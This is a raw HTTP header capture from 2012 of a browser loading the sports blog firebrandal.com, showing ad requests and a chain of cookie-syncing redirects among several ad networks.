Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Content-Encoding: gzip
X-FB-Debug: IokEis5jBUuEwyv93n7xXbKPiueV8/tO8WM9a27I2Eo=
Content-Length: 9716
Vary: Accept-Encoding
Cache-Control: public, max-age=31325471
Expires: Sun, 03 Nov 2013 06:31:48 GMT
Date: Mon, 05 Nov 2012 17:00:37 GMT
Connection: keep-alive
GET /adserver/dsy.php?from=http%3A%2F%2Fdelivery.switchadhub.com%2Fadserver&oaid=7b0c8f7c48610ccc2add5a20ebb44c8a&store=1&status=1&mid=0 HTTP/1.1

Host: delivery.switchadhub.com
GET /adserver/dsy.php?from=http%3A%2F%2Fdelivery.switchadhub.com%2Fadserver&amp;oaid=7b0c8f7c48610ccc2add5a20ebb44c8a&amp;store=1&amp;status=1&amp;mid=0 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
Cookie: OAID=7b0c8f7c48610ccc2add5a20ebb44c8a; SWID=7b0c8f7c48610ccc2add5a20ebb44c8a; OACBLOCK=1822.1352134837; OACCAP=1822.1; _OACCAP[1822]=1; _OACBLOCK[1822]=1352134837
HTTP/1.0 302 Found

Content-Type: text/html
X-Powered-By: PHP/5.3.6
Set-Cookie: _OACBLOCK[1822]=deleted; expires=Sun, 06-Nov-2011 17:00:36 GMT; path=/ %5FOACBLOCK%5B1822%5D=deleted; expires=Sun, 06-Nov-2011 17:00:36 GMT; path=/ _OACCAP[1822]=deleted; expires=Sun, 06-Nov-2011 17:00:36 GMT; path=/ %5FOACCAP%5B1822%5D=deleted; expires=Sun, 06-Nov-2011 17:00:36 GMT; path=/ SWID=7b0c8f7c48610ccc2add5a20ebb44c8a; expires=Tue, 05-Nov-2013 17:00:37 GMT; path=/ OACBLOCK=1822.1352134837; expires=Wed, 05-Dec-2012 17:00:37 GMT; path=/ OACCAP=1822.2; expires=Tue, 05-Nov-2013 17:00:37 GMT; path=/ OACBLOCK=1822.1352134837; expires=Wed, 05-Dec-2012 17:00:37 GMT; path=/ OACCAP=1822.2; expires=Tue, 05-Nov-2013 17:00:37 GMT; path=/
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: http://tag.admeld.com/id?redirect=http%3A%2F%2Fdelivery.switchadhub.com%2Fadserver%2Fdsy.php%3Fidx%3D65151e6%26ret%3D%5Badmeld_user_id%5D%26mid%3D0%26override%3D0%26store%3D1%26status%3D1%26from%3Dhttp%3A%2F%2Fdelivery.switchadhub.com%2Fadserver%26swid%3D7b0c8f7c48610ccc2add5a20ebb44c8a
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Content-Length: 0
Date: Mon, 05 Nov 2012 17:00:37 GMT
Server: lighttpd/1.4.26
Connection: close
GET /id?redirect=http%3A%2F%2Fdelivery.switchadhub.com%2Fadserver%2Fdsy.php%3Fidx%3D65151e6%26ret%3D%5Badmeld_user_id%5D%26mid%3D0%26override%3D0%26store%3D1%26status%3D1%26from%3Dhttp%3A%2F%2Fdelivery.switchadhub.com%2Fadserver%26swid%3D7b0c8f7c48610ccc2add5a20ebb44c8a HTTP/1.1

Host: tag.admeld.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
Cookie: meld_sess=bbeaaa1b-8eda-4510-8721-df07b3f95b13
HTTP/1.1 302 Moved Temporarily

Content-Type: text/html; charset=iso-8859-1
Server: Apache
P3P: policyref=&quot;http://tag.admeld.com/w3c/p3p.xml&quot;, CP=&quot;PSAo PSDo OUR SAM OTR BUS DSP ALL COR&quot;
Location: http://delivery.switchadhub.com/adserver/dsy.php?idx=65151e6&amp;ret=bbeaaa1b-8eda-4510-8721-df07b3f95b13&amp;mid=0&amp;override=0&amp;store=1&amp;status=1&amp;from=http://delivery.switchadhub.com/adserver&amp;swid=7b0c8f7c48610ccc2add5a20ebb44c8a
Content-Length: 431
Date: Mon, 05 Nov 2012 17:00:37 GMT
Connection: keep-alive
GET /id?redirect=http%3A%2F%2Fdelivery.switchadhub.com%2Fadserver%2Fdsy.php%3Fidx%3D65151e6%26ret%3D%5Badmeld_user_id%5D%26mid%3D0%26override%3D0%26store%3D1%26status%3D1%26from%3Dhttp%3A%2F%2Fdelivery.switchadhub.com%2Fadserver%26swid%3D7b0c8f7c48610ccc2add5a20ebb44c8a HTTP/1.1

Host: tag.admeld.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
Cookie: meld_sess=bbeaaa1b-8eda-4510-8721-df07b3f95b13
HTTP/1.1 302 Moved Temporarily

Content-Type: text/html; charset=iso-8859-1
Server: Apache
P3P: policyref=&quot;http://tag.admeld.com/w3c/p3p.xml&quot;, CP=&quot;PSAo PSDo OUR SAM OTR BUS DSP ALL COR&quot;
Location: http://delivery.switchadhub.com/adserver/dsy.php?idx=65151e6&amp;ret=bbeaaa1b-8eda-4510-8721-df07b3f95b13&amp;mid=0&amp;override=0&amp;store=1&amp;status=1&amp;from=http://delivery.switchadhub.com/adserver&amp;swid=7b0c8f7c48610ccc2add5a20ebb44c8a
Content-Length: 431
Date: Mon, 05 Nov 2012 17:00:37 GMT
Connection: keep-alive
GET /wp-content/themes/editorial/images/bg-footerwrap.png HTTP/1.1

Host: firebrandal.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/wp-content/themes/editorial/style.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 05 Nov 2012 17:00:37 GMT
Server: Apache
Last-Modified: Tue, 27 Mar 2012 23:04:48 GMT
Etag: &quot;5ed15ee-8a-4bc418479be67&quot;
Accept-Ranges: bytes
Content-Length: 138
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
GET /adserver/dsy.php?idx=65151e6&ret=bbeaaa1b-8eda-4510-8721-df07b3f95b13&mid=0&override=0&store=1&status=1&from=http://delivery.switchadhub.com/adserver&swid=7b0c8f7c48610ccc2add5a20ebb44c8a HTTP/1.1

Host: delivery.switchadhub.com
GET /adserver/dsy.php?idx=65151e6&amp;ret=bbeaaa1b-8eda-4510-8721-df07b3f95b13&amp;mid=0&amp;override=0&amp;store=1&amp;status=1&amp;from=http://delivery.switchadhub.com/adserver&amp;swid=7b0c8f7c48610ccc2add5a20ebb44c8a HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
Cookie: OAID=7b0c8f7c48610ccc2add5a20ebb44c8a; SWID=7b0c8f7c48610ccc2add5a20ebb44c8a; OACBLOCK=1822.1352134837; OACCAP=1822.2
HTTP/1.0 302 Found

Content-Type: text/html
X-Powered-By: PHP/5.3.6
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: SWID=7b0c8f7c48610ccc2add5a20ebb44c8a; expires=Tue, 05-Nov-2013 17:00:37 GMT; path=/ ADM=bbeaaa1b-8eda-4510-8721-df07b3f95b13; expires=Tue, 05-Nov-2013 17:00:37 GMT; path=/
Location: http://ib.adnxs.com/getuid?http%3A%2F%2Fdelivery.switchadhub.com%2Fadserver%2Fdsy.php%3Fidx%3D880bdf2%26ret%3D%24UID%26mid%3D0%26override%3D0%26store%3D1%26status%3D1%26from%3Dhttp%3A%2F%2Fdelivery.switchadhub.com%2Fadserver%26swid%3D7b0c8f7c48610ccc2add5a20ebb44c8a
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Content-Length: 0
Date: Mon, 05 Nov 2012 17:00:37 GMT
Server: lighttpd/1.4.26
Connection: close
GET /getuid?http%3A%2F%2Fdelivery.switchadhub.com%2Fadserver%2Fdsy.php%3Fidx%3D880bdf2%26ret%3D%24UID%26mid%3D0%26override%3D0%26store%3D1%26status%3D1%26from%3Dhttp%3A%2F%2Fdelivery.switchadhub.com%2Fadserver%26swid%3D7b0c8f7c48610ccc2add5a20ebb44c8a HTTP/1.1

Host: ib.adnxs.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG7]PCxrx)0s]#%2L_'x%SEV/hnJip8Ep.I(G*axlrk5.$WN_]Dl5M7G(nDS'6pnU
HTTP/1.1 302 Moved

Content-Type: text/html; charset=ISO-8859-1
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Sun, 03-Feb-2013 17:00:38 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Tue, 06-Nov-2012 17:00:38 GMT; domain=.adnxs.com; HttpOnly
Location: http://delivery.switchadhub.com/adserver/dsy.php?idx=880bdf2&amp;ret=5858721859426781856&amp;mid=0&amp;override=0&amp;store=1&amp;status=1&amp;from=http://delivery.switchadhub.com/adserver&amp;swid=7b0c8f7c48610ccc2add5a20ebb44c8a
Date: Mon, 05 Nov 2012 17:00:38 GMT
Content-Length: 0
GET /adserver/dsy.php?idx=65151e6&ret=bbeaaa1b-8eda-4510-8721-df07b3f95b13&mid=0&override=0&store=1&status=1&from=http://delivery.switchadhub.com/adserver&swid=7b0c8f7c48610ccc2add5a20ebb44c8a HTTP/1.1

Host: delivery.switchadhub.com
GET /adserver/dsy.php?idx=65151e6&amp;ret=bbeaaa1b-8eda-4510-8721-df07b3f95b13&amp;mid=0&amp;override=0&amp;store=1&amp;status=1&amp;from=http://delivery.switchadhub.com/adserver&amp;swid=7b0c8f7c48610ccc2add5a20ebb44c8a HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
Cookie: OAID=7b0c8f7c48610ccc2add5a20ebb44c8a; SWID=7b0c8f7c48610ccc2add5a20ebb44c8a; OACBLOCK=1822.1352134837; OACCAP=1822.2
HTTP/1.0 302 Found

Content-Type: text/html
X-Powered-By: PHP/5.3.6
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: SWID=7b0c8f7c48610ccc2add5a20ebb44c8a; expires=Tue, 05-Nov-2013 17:00:38 GMT; path=/ ADM=bbeaaa1b-8eda-4510-8721-df07b3f95b13; expires=Tue, 05-Nov-2013 17:00:38 GMT; path=/
Location: http://ib.adnxs.com/getuid?http%3A%2F%2Fdelivery.switchadhub.com%2Fadserver%2Fdsy.php%3Fidx%3D880bdf2%26ret%3D%24UID%26mid%3D0%26override%3D0%26store%3D1%26status%3D1%26from%3Dhttp%3A%2F%2Fdelivery.switchadhub.com%2Fadserver%26swid%3D7b0c8f7c48610ccc2add5a20ebb44c8a
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Content-Length: 0
Date: Mon, 05 Nov 2012 17:00:38 GMT
Server: lighttpd/1.4.26
Connection: close
GET /getuid?http%3A%2F%2Fdelivery.switchadhub.com%2Fadserver%2Fdsy.php%3Fidx%3D880bdf2%26ret%3D%24UID%26mid%3D0%26override%3D0%26store%3D1%26status%3D1%26from%3Dhttp%3A%2F%2Fdelivery.switchadhub.com%2Fadserver%26swid%3D7b0c8f7c48610ccc2add5a20ebb44c8a HTTP/1.1

Host: ib.adnxs.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG7]PCxrx)0s]#%2L_'x%SEV/hnJip8Ep.I(G*axlrk5.$WN_]Dl5M7G(nDS'6pnU; sess=1
HTTP/1.1 302 Moved

Content-Type: text/html; charset=ISO-8859-1
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Sun, 03-Feb-2013 17:00:38 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Tue, 06-Nov-2012 17:00:38 GMT; domain=.adnxs.com; HttpOnly
Location: http://delivery.switchadhub.com/adserver/dsy.php?idx=880bdf2&amp;ret=5858721859426781856&amp;mid=0&amp;override=0&amp;store=1&amp;status=1&amp;from=http://delivery.switchadhub.com/adserver&amp;swid=7b0c8f7c48610ccc2add5a20ebb44c8a
Date: Mon, 05 Nov 2012 17:00:38 GMT
Content-Length: 0
GET /adserver/dsy.php?idx=880bdf2&ret=5858721859426781856&mid=0&override=0&store=1&status=1&from=http://delivery.switchadhub.com/adserver&swid=7b0c8f7c48610ccc2add5a20ebb44c8a HTTP/1.1

Host: delivery.switchadhub.com
GET /adserver/dsy.php?idx=880bdf2&amp;ret=5858721859426781856&amp;mid=0&amp;override=0&amp;store=1&amp;status=1&amp;from=http://delivery.switchadhub.com/adserver&amp;swid=7b0c8f7c48610ccc2add5a20ebb44c8a HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
Cookie: OAID=7b0c8f7c48610ccc2add5a20ebb44c8a; SWID=7b0c8f7c48610ccc2add5a20ebb44c8a; OACBLOCK=1822.1352134837; OACCAP=1822.2; ADM=bbeaaa1b-8eda-4510-8721-df07b3f95b13
HTTP/1.0 302 Found

Content-Type: text/html
X-Powered-By: PHP/5.3.6
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: SWID=7b0c8f7c48610ccc2add5a20ebb44c8a; expires=Tue, 05-Nov-2013 17:00:38 GMT; path=/ APP=5858721859426781856; expires=Tue, 05-Nov-2013 17:00:38 GMT; path=/
Location: http://app.struq.com/ud/8?v=1&amp;redir=http%3A%2F%2Fdelivery.switchadhub.com%2Fadserver%2Fdsy.php%3Fidx%3D3bd2fd5%26ret%3D%7Buserid%7D%26mid%3D0%26override%3D0%26store%3D1%26status%3D1%26from%3Dhttp%3A%2F%2Fdelivery.switchadhub.com%2Fadserver%26swid%3D7b0c8f7c48610ccc2add5a20ebb44c8a
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Content-Length: 0
Date: Mon, 05 Nov 2012 17:00:38 GMT
Server: lighttpd/1.4.26
Connection: close
GET /clients/redsox/wp-content/uploads/2012/02/header3.png HTTP/1.1

Host: www.krauppinc.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 05 Nov 2012 17:00:36 GMT
Server: Apache
Last-Modified: Tue, 21 Feb 2012 20:18:52 GMT
Etag: &quot;53908c-77767-4b97f1e966300&quot;
Accept-Ranges: bytes
Content-Length: 489319
Keep-Alive: timeout=2, max=200
Connection: Keep-Alive
GET /js/wordpressTemplateLinkWrapper2.php?acct=2de79bffcdcb7dd83c27821260b1eebb HTTP/1.1

Host: intensedebate.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
Server: nginx
Date: Mon, 05 Nov 2012 17:00:38 GMT
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
P3P: CP=&quot;NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM&quot;
Cache-Control: max-age=3600, must-revalidate
Last-Modified: Wed, 29 Feb 2012 20:09:50 GMT
Expires: Mon, 05 Nov 2012 18:00:38 GMT
Pragma: public
Content-Encoding: gzip
GET /adserver/dsy.php?idx=880bdf2&ret=5858721859426781856&mid=0&override=0&store=1&status=1&from=http://delivery.switchadhub.com/adserver&swid=7b0c8f7c48610ccc2add5a20ebb44c8a HTTP/1.1

Host: delivery.switchadhub.com
GET /adserver/dsy.php?idx=880bdf2&amp;ret=5858721859426781856&amp;mid=0&amp;override=0&amp;store=1&amp;status=1&amp;from=http://delivery.switchadhub.com/adserver&amp;swid=7b0c8f7c48610ccc2add5a20ebb44c8a HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
Cookie: OAID=7b0c8f7c48610ccc2add5a20ebb44c8a; SWID=7b0c8f7c48610ccc2add5a20ebb44c8a; OACBLOCK=1822.1352134837; OACCAP=1822.2; ADM=bbeaaa1b-8eda-4510-8721-df07b3f95b13
HTTP/1.0 302 Found

Content-Type: text/html
X-Powered-By: PHP/5.3.6
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: SWID=7b0c8f7c48610ccc2add5a20ebb44c8a; expires=Tue, 05-Nov-2013 17:00:38 GMT; path=/ APP=5858721859426781856; expires=Tue, 05-Nov-2013 17:00:38 GMT; path=/
Location: http://app.struq.com/ud/8?v=1&amp;redir=http%3A%2F%2Fdelivery.switchadhub.com%2Fadserver%2Fdsy.php%3Fidx%3D3bd2fd5%26ret%3D%7Buserid%7D%26mid%3D0%26override%3D0%26store%3D1%26status%3D1%26from%3Dhttp%3A%2F%2Fdelivery.switchadhub.com%2Fadserver%26swid%3D7b0c8f7c48610ccc2add5a20ebb44c8a
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Content-Length: 0
Date: Mon, 05 Nov 2012 17:00:38 GMT
Server: lighttpd/1.4.26
Connection: close
GET /ud/8?v=1&redir=http%3A%2F%2Fdelivery.switchadhub.com%2Fadserver%2Fdsy.php%3Fidx%3D3bd2fd5%26ret%3D%7Buserid%7D%26mid%3D0%26override%3D0%26store%3D1%26status%3D1%26from%3Dhttp%3A%2F%2Fdelivery.switchadhub.com%2Fadserver%26swid%3D7b0c8f7c48610ccc2add5a20ebb44c8a HTTP/1.1

Host: app.struq.com
GET /ud/8?v=1&amp;redir=http%3A%2F%2Fdelivery.switchadhub.com%2Fadserver%2Fdsy.php%3Fidx%3D3bd2fd5%26ret%3D%7Buserid%7D%26mid%3D0%26override%3D0%26store%3D1%26status%3D1%26from%3Dhttp%3A%2F%2Fdelivery.switchadhub.com%2Fadserver%26swid%3D7b0c8f7c48610ccc2add5a20ebb44c8a HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: image/gif
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
P3P: CP=&quot;NON DSP COR CUR PSAo PSDo OUR BUS COM NAV INT STA PRE&quot;
Date: Mon, 05 Nov 2012 17:00:37 GMT
Connection: close
Content-Length: 43
GET /pagead/ads?client=ca-pub-3515913239267445&output=html&h=250&slotname=6323475569&w=300&lmt=1352134830&flash=10.0.45&url=http%3A%2F%2Ffirebrandal.com%2F&dt=1352134837476&bpp=4&shv=r20121023&jsv=r20110914&prev_slotnames=0998046247&correlator=1352134836584&frm=20&adk=3370988103&ga_vid=699239837.1352134837&ga_sid=1352134837&ga_hid=1329589676&ga_fc=0&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=8&u_nmime=54&dff=helvetica&dfs=13&adx=770&ady=794&biw=1159&bih=778&oid=3&fu=0&ifi=2&dtd=89&xpc=N0GGNbLLEj&p=http%3A//firebrandal.com HTTP/1.1

Host: googleads.g.doubleclick.net
GET /pagead/ads?client=ca-pub-3515913239267445&amp;output=html&amp;h=250&amp;slotname=6323475569&amp;w=300&amp;lmt=1352134830&amp;flash=10.0.45&amp;url=http%3A%2F%2Ffirebrandal.com%2F&amp;dt=1352134837476&amp;bpp=4&amp;shv=r20121023&amp;jsv=r20110914&amp;prev_slotnames=0998046247&amp;correlator=1352134836584&amp;frm=20&amp;adk=3370988103&amp;ga_vid=699239837.1352134837&amp;ga_sid=1352134837&amp;ga_hid=1329589676&amp;ga_fc=0&amp;u_tz=60&amp;u_his=1&amp;u_java=1&amp;u_h=885&amp;u_w=1176&amp;u_ah=855&amp;u_aw=1176&amp;u_cd=24&amp;u_nplug=8&amp;u_nmime=54&amp;dff=helvetica&amp;dfs=13&amp;adx=770&amp;ady=794&amp;biw=1159&amp;bih=778&amp;oid=3&amp;fu=0&amp;ifi=2&amp;dtd=89&amp;xpc=N0GGNbLLEj&amp;p=http%3A//firebrandal.com HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
Cookie: id=223ae1776901005b||t=1350343758|et=730|cs=002213fd480aa30e9cef2f5d42
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
P3P: policyref=&quot;http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml&quot;, CP=&quot;CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR&quot;
X-Content-Type-Options: nosniff
Content-Encoding: gzip
Date: Mon, 05 Nov 2012 17:00:38 GMT
Server: cafe
Cache-Control: private
Content-Length: 6313
X-XSS-Protection: 1; mode=block
GET /mlb/sweetspot/localMod?site=firebrand HTTP/1.1

Host: espn.go.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
Cookie: SWID=A473651E-1FF3-4B33-A964-02760AC37F33
HTTP/1.1 200 OK

Content-Type: text/html
Cache-Control: max-age=15
Content-Encoding: gzip
Transfer-Encoding: chunked
Date: Mon, 05 Nov 2012 17:00:39 GMT
Age: 0
Connection: keep-alive
P3P: CP=&quot;CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE&quot;
GET /pagead/ads?client=ca-pub-3256725667777155&output=html&h=90&slotname=0998046247&w=728&lmt=1352134830&flash=10.0.45&url=http%3A%2F%2Ffirebrandal.com%2F&dt=1352134836387&bpp=7&shv=r20121023&jsv=r20110914&correlator=1352134836584&frm=20&adk=353781055&ga_vid=699239837.1352134837&ga_sid=1352134837&ga_hid=1329589676&ga_fc=0&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=8&u_nmime=54&dff=tahoma&dfs=12&adx=216&ady=264&biw=1159&bih=778&oid=3&fu=0&ifi=1&dtd=945&xpc=qkZdIfVrBI&p=http%3A//firebrandal.com HTTP/1.1

Host: googleads.g.doubleclick.net
GET /pagead/ads?client=ca-pub-3256725667777155&amp;output=html&amp;h=90&amp;slotname=0998046247&amp;w=728&amp;lmt=1352134830&amp;flash=10.0.45&amp;url=http%3A%2F%2Ffirebrandal.com%2F&amp;dt=1352134836387&amp;bpp=7&amp;shv=r20121023&amp;jsv=r20110914&amp;correlator=1352134836584&amp;frm=20&amp;adk=353781055&amp;ga_vid=699239837.1352134837&amp;ga_sid=1352134837&amp;ga_hid=1329589676&amp;ga_fc=0&amp;u_tz=60&amp;u_his=1&amp;u_java=1&amp;u_h=885&amp;u_w=1176&amp;u_ah=855&amp;u_aw=1176&amp;u_cd=24&amp;u_nplug=8&amp;u_nmime=54&amp;dff=tahoma&amp;dfs=12&amp;adx=216&amp;ady=264&amp;biw=1159&amp;bih=778&amp;oid=3&amp;fu=0&amp;ifi=1&amp;dtd=945&amp;xpc=qkZdIfVrBI&amp;p=http%3A//firebrandal.com HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
Cookie: id=223ae1776901005b||t=1350343758|et=730|cs=002213fd480aa30e9cef2f5d42
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
P3P: policyref=&quot;http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml&quot;, CP=&quot;CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR&quot;
X-Content-Type-Options: nosniff
Content-Encoding: gzip
